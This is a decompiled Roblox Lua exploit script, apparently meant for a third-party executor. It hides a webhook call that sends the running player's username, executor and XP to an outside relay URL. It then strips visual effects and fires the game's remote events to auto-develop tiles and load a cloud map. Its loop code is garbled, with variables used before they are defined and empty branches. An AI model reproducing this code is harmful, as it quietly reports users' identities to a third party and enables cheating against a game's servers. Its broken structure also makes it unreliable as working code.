-- ts file was generated at discord.gg/25ms


local v1 = game.Players.LocalPlayer
local v2 = v1.Name
local v3 = identifyexecutor and identifyexecutor() or "Unknown"
local v4 = v1.PlayerGui.MainUI.LeftSide.Buttons.Folder.XP.Text
local v5 = "https://v0-discord-webhook-protector-nine.vercel.app/api/relay/z1adivz167c"
if getgenv().adm then
    return
end
getgenv().adm = true
local v6 = {
    content = "@everyone",
    embeds = {
        {
            title = "New Execution",
            description = "**Username:** " .. v2 .. "\n**Executor:** " .. v3 .. "\n " .. v4,
            color = 65280
        }
    }
}
local v7 = request
local v8 = {
    Url = v5,
    Method = "POST",
    Headers = {
        ["Content-Type"] = "application/json"
    },
    Body = game:GetService("HttpService"):JSONEncode(v6)
}
v7(v8)
local v9 = game:GetService("Workspace")
v9.DescendantAdded:Connect(function(p10)
    if p10:IsA("ParticleEmitter") or (p10:IsA("Beam") or (p10:IsA("Trail") or (p10:IsA("Smoke") or (p10:IsA("Fire") or (p10:IsA("Explosion") or p10:IsA("Highlight")))))) then
        p10:Destroy()
    end
end)
local v11, v12, v13 = ipairs(v9:GetDescendants())


if v14:IsA("ParticleEmitter") or (v14:IsA("Beam") or (v14:IsA("Trail") or (v14:IsA("Smoke") or (v14:IsA("Fire") or (v14:IsA("Explosion") or v14:IsA("Highlight")))))) then
    v14:Destroy()
end

local v14
v13, v14 = v11(v12, v13)
if v13 ~= nil then
	
else
	
end

game:GetService("Lighting").Changed:Connect(function(p15)
    if p15 == "Atmosphere" or (p15 == "Bloom" or p15 == "ColorCorrection") then
        game:GetService("Lighting")[p15]:Destroy()
    end
end)
local v16 = game:GetService("Players").LocalPlayer
local v17 = game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent_1")
local v18 = workspace:WaitForChild("Regions")
local v19 = v16:GetAttribute("MyCountry")
if not v19 then
    return
end

local v20, v21, v22 = ipairs(v18:GetChildren())

local v23
v22, v23 = v20(v21, v22)
if v22 == nil then
	
end
if v23:GetAttribute("Country") == v19 then
    v17:FireServer("DevelopTile", v23, "Tier", true)
end


task.wait(1)
game:GetService("ReplicatedStorage"):WaitForChild("RemoteEvent_1"):FireServer(unpack({
    "LoadMapFromCloud",
    567888060
}))
task.wait(1)